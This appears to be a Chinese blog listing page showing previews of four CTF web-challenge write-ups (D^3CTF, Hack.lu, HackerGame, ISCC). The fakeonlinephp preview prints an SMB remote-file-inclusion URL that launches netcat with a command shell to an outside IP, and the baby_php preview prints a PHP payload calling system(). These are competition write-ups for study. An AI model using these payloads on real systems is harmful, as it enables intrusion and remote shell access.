- 博客(4)
- 收藏
- 关注
RSS订阅
原创 2019 D^3CTF_wp:fakeonlinephp解法(类实网渗透)
D3ctf fake_online_php 题解 外网渗透部分 smb协议利用导致远程文件包含 http://35547429ed.fakeonelinephp.d3ctf.io/?orange=\**********\share\test5&a=…\nc2.exe±e+cmd+39.105.136.196+30023 内网渗透部分 再写一个马子 进入远程桌面 ...
2019-11-26 09:55:16
3583
原创 Hacklu baby_php wp
Baby_php 这题就是各种php黑魔法的集合,先上payload /?msg=php://input&key1=1337&key2=000000000000000000000000000000000001337$&cc[]=&k1=2&bb=system(‘cat flag.php’);// Post数据加上Hello Challenge! 介绍几个Ph...
2018-10-26 00:15:07
400
原创 中科大HackerGame2018 web题目 writeup
虽然很坑,但是总体来说这次还是做了很多有意思的web题,这里也只给出web题的答案 一:签到题 打开发现是要输入key值提交 但是输入后发现限制了长度,只允许输入到hackergame201 打开burp,截包,改包,发送得到flag 二:Word文档 打开题目链接发现是下载了一个officeopenXML.docx的文件 上网查阅发现这个是早期word推出的一种文件格式,其实可以改成zi...
2018-10-26 00:14:59
2503
原创 iscc_2018 web题解
一切都是套路 开头比较客气,试了.bak .swp .svn都没有出来,结果发现是.txt,还是自己想复杂了 典型的变量覆盖漏洞,不用想了,直接先将flag的值赋给flag的值赋给flag的值赋给_200变量,然后利用die($_200)将flag打印出来。 你能绕过吗 id那里是只允许输入int吧我估计。。。什么十六进制或者其他的字母都认不出来,可能我水平不够想不到其他注入了。 我...
2018-10-25 23:26:19
2322
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人